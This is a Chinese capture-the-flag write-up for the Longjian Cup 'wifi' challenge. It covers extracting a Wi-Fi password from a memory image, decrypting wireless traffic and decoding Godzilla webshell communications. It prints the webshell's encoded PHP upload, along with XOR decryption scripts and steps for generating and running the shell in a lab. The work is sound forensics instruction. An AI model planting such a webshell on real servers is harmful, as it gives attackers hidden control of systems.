首届“陇剑杯”网络安全大赛题目wifi详解

写文章只是为了记录自己的学习,不是粘贴复制就完事了
参考
https://www.cnblogs.com/GKLBB/p/15315725.html
https://www.nctry.com/2449.html
https://www.freebuf.com/sectool/285693.html

首届“陇剑杯”网络安全大赛题目wifi详解_第1张图片题目链接: https://pan.baidu.com/s/1H2iVCuntQuyIemELCDXl6w
提取码: c6pk

常规姿势

文件内容
首届“陇剑杯”网络安全大赛题目wifi详解_第2张图片

用wireshake打开客户端.cap
首届“陇剑杯”网络安全大赛题目wifi详解_第3张图片发现流量被加密,但是依旧可以发现WiFi的名字是My_Wifi
要解密的话就需要wifi的密码
对windows而言,只要连过这个wifi,它的信息就会被保存,包括密码
查看连过的wifi
首届“陇剑杯”网络安全大赛题目wifi详解_第4张图片
查看某个密码
首届“陇剑杯”网络安全大赛题目wifi详解_第5张图片
这些东西都在一个xml文件里
首届“陇剑杯”网络安全大赛题目wifi详解_第6张图片
知道了这些后我们就可以去镜像找xml文件了
因为没接触过取证用的volatility
又写了关于我在windows使用volatility取证这档事
在这里插入图片描述
扫描镜像里的文件把结果存到files.txt里
打开files.txt搜索.xml
得到四行结果

0x1e6d1530	\Windows\System32\tcpbidi.xml	128
0x3fcc5908	\Windows\System32\RacRules.xml	128
0x3fd0d390	\Windows\assembly\NativeImages_v2.0.50727_32\System.Xml\5dd9f783008543df3e642ff1e99de4e8\System.Xml.ni.dll	128
0x3fd67bb0	\Windows\assembly\GAC_MSIL\System.Xml\2.0.0.0__b77a5c561934e089\System.XML.dll	128

显然这不是我们想找的文件
此外我们还知道的信息是WiFi的名字是My_Wifi
搜索My_Wifi得到一行结果

0x3fdc38c8	\Program Files\My_Wifi.zip\Temp\vmware-admin\VMwareDnD\2a1221c7\My_Wifi.zip	128

先把这个文件dump下来看看
首届“陇剑杯”网络安全大赛题目wifi详解_第7张图片首届“陇剑杯”网络安全大赛题目wifi详解_第8张图片
拖到Windows修改文件名为wifi.zip然后解压
首届“陇剑杯”网络安全大赛题目wifi详解_第9张图片在这里插入图片描述
题目说了压缩包里有密码的提示

首届“陇剑杯”网络安全大赛题目wifi详解_第10张图片网卡的guid就是密码
同时网卡的guid也是保存配置文件夹的名字
所以在files.txt里搜索Interfaces得到四行结果

0x1c7ec5c8	\ProgramData\Microsoft\Wlansvc\Profiles\Interfaces\{529B7D2A-05D1-4F21-A001-8F4FF817FC3A}	128
0x1f78f4b0	\ProgramData\Microsoft\Wlansvc\Profiles\Interfaces	128
0x3fa921c8	\ProgramData\Microsoft\Wlansvc\Profiles\Interfaces\{529B7D2A-05D1-4F21-A001-8F4FF817FC3A}	128
0x3fda8be8	\ProgramData\Microsoft\Wlansvc\Profiles\Interfaces	128

在这里插入图片描述题目说了要加上花括号
所以解压密码就是{529B7D2A-05D1-4F21-A001-8F4FF817FC3A}
打开里面的xml文件发现密码是233@114514_qwe
首届“陇剑杯”网络安全大赛题目wifi详解_第11张图片

得到密码和ssid后对流量解密
首届“陇剑杯”网络安全大赛题目wifi详解_第12张图片
选择protocols
找到IEEE 802.11
首届“陇剑杯”网络安全大赛题目wifi详解_第13张图片
首届“陇剑杯”网络安全大赛题目wifi详解_第14张图片
wifi包解密后
首届“陇剑杯”网络安全大赛题目wifi详解_第15张图片但是wifi这么多包,不确定哪些属于webshell的流量
这时候服务器的包就可以派上用场了
上传哥斯拉用的是POST
过滤POST数据包得到服务器IP:42.192.84.152
首届“陇剑杯”网络安全大赛题目wifi详解_第16张图片
导出http对象
首届“陇剑杯”网络安全大赛题目wifi详解_第17张图片
得到5个php文件
首届“陇剑杯”网络安全大赛题目wifi详解_第18张图片
已知上传的是哥斯拉的马
看到%什么什么应该就知道这是url编码吧
所以首先拿去url解码
首届“陇剑杯”网络安全大赛题目wifi详解_第19张图片
拿到php环境执行一下

echo base64_decode(strrev(urldecode('K0QfK0QfgACIgoQD9BCIgACIgACIK0wOpkXZrRCLhRXYkRCKlR2bj5WZ90VZtFmTkF2bslXYwRyWO9USTNVRT9FJgACIgACIgACIgACIK0wepU2csFmZ90TIpIybm5WSzNWazFmQ0V2ZiwSY0FGZkgycvBXayR3coAiZpBCIgACIgACIK0welNHbl1HIgACIK0wOpYTMskSeltGJuM3chBHJoUDZthic0NnY1NHIvh2YlBCIgACIgACIK0wOpkSeltGJskSY0FGZkgib1JHQoUGZvNmblhSZk92YuV2X0YTZzFmYg8GajVGIgACIgACIgoQD7kiNxwCMskSeltGJuM3chBHJoUDZthic0NnY1NHIvh2YlBCIgACIgACIK0wOpQWYvxWehBHJowWY2VGIgACIgACIgoQD7kSeltGJs0VZtFmTkF2bslXYwRyWO9USTNVRT9FJoUGZvNmbl1DZh9Gb5FGckACIgACIgACIK0wepkSXl1WYORWYvxWehBHJb50TJN1UFN1XkgCdlN3cphCImlGIgACIK0wOpkXZrRCLp01czFGcksFVT9EUfRCKlR2bjVGZfRjNlNXYihSZk92YuVWPhRXYkRCIgACIK0wepkSXzNXYwRyWUN1TQ9FJoQXZzNXaoAiZppQD7cSY0IjM1EzY5EGOiBTZ2M2Mn0TeltGJK0wOnQWYvxWehB3J9UWbh5EZh9Gb5FGckoQD7cSelt2J9M3chBHJK0QfK0wOERCIuJXd0VmcgACIgoQD9BCIgAiCNszYk4VXpRyWERCI9ASXpRyWERCIgACIgACIgoQD70VNxYSMrkGJbtEJg0DIjRCIgACIgACIgoQD7BSKrsSaksTKERCKuVGbyR3c8kGJ7ATPpRCKy9mZgACIgoQD7lySkwCRkgSZk92YuVGIu9Wa0Nmb1ZmCNsTKwgyZulGdy9GclJ3Xy9mcyVGQK0wOpADK0lWbpx2Xl1Wa09FdlNHQK0wOpgCdyFGdz9lbvl2czV2cApQD')));

得到上传的代码
首届“陇剑杯”网络安全大赛题目wifi详解_第20张图片
可以看出使用的是php_xor_base64的加密器
如果看不出可以用哥斯拉生成对比一下使用的是什么加密器

接下来就是对哥斯拉的数据包解密了
说实话我也不会
所以又写了哥斯拉还原加密流量
看过哥斯拉流量分析后就很容易了
对于哥斯拉POST的数据包使用这个脚本解密



function encode($D,$K){
    for($i=0;$i<strlen($D);$i++){
        $c = $K[$i+1&15];
        $D[$i] = $D[$i]^$c;
    }
    return $D;
}

$pass='pass';
$payloadName='payload';
$key='3c6e0b8a9c15224a';

echo encode(base64_decode(urldecode('xxxxxxx')),$key);


对于哥斯拉的返回包使用这个脚本解密


function encode($D,$K){
    for($i=0;$i<strlen($D);$i++){
        $c = $K[$i+1&15];
        $D[$i] = $D[$i]^$c;
    }
    return $D;
}

$pass='pass';
$payloadName='payload';
$key='3c6e0b8a9c15224a';
// 原来的数据去掉前十六位和后十六位然后解密
echo gzdecode(encode(base64_decode(''),$key));

在POST里肯定没有什么我们想要的东西
所以返回到客户端.cap
筛选http的数据包
首届“陇剑杯”网络安全大赛题目wifi详解_第21张图片这里恰好都是源ip为42.192.84.152
如果有其它源ip不是42.192.84.152的就过滤掉
然后导出http对象
首届“陇剑杯”网络安全大赛题目wifi详解_第22张图片
得到这么多文件

首届“陇剑杯”网络安全大赛题目wifi详解_第23张图片
把css,js,png结尾的文件删掉
剩下这么多打开查看
首届“陇剑杯”网络安全大赛题目wifi详解_第24张图片
发现只有四个是哥斯拉的返回包

在这里插入图片描述
利用上面的脚本开始解密
解密的时候要去掉头16位去掉尾16位
其中第一个包解密后为
首届“陇剑杯”网络安全大赛题目wifi详解_第25张图片
第二个包解密
首届“陇剑杯”网络安全大赛题目wifi详解_第26张图片
第三个包解密
首届“陇剑杯”网络安全大赛题目wifi详解_第27张图片
第四个包解密得到flag
首届“陇剑杯”网络安全大赛题目wifi详解_第28张图片

大佬的另一种姿势

当你没有解密脚本的时候
已知条件哥斯拉木马的源码
首届“陇剑杯”网络安全大赛题目wifi详解_第29张图片
观察发现这个key就是默认的key
也就是key经过md5加密后前16位
验证猜想:用哥斯拉生成一个木马
首届“陇剑杯”网络安全大赛题目wifi详解_第30张图片首届“陇剑杯”网络安全大赛题目wifi详解_第31张图片发现两个是一样的
接下来把木马丢到虚拟机里
用phpstudy搭个环境
首届“陇剑杯”网络安全大赛题目wifi详解_第32张图片

打开哥斯拉测试连接
首届“陇剑杯”网络安全大赛题目wifi详解_第33张图片
开启burp代理添加

首届“陇剑杯”网络安全大赛题目wifi详解_第34张图片
首届“陇剑杯”网络安全大赛题目wifi详解_第35张图片
执行一个命令截断
首届“陇剑杯”网络安全大赛题目wifi详解_第36张图片首届“陇剑杯”网络安全大赛题目wifi详解_第37张图片
最多四次就出来了,之前导出的http对象不是还剩这四个是格拉斯加密的包吗
在这里插入图片描述

首届“陇剑杯”网络安全大赛题目wifi详解_第38张图片
这样干的好处就是不需要解密脚本了

你可能感兴趣的:(WP,网络安全,windows)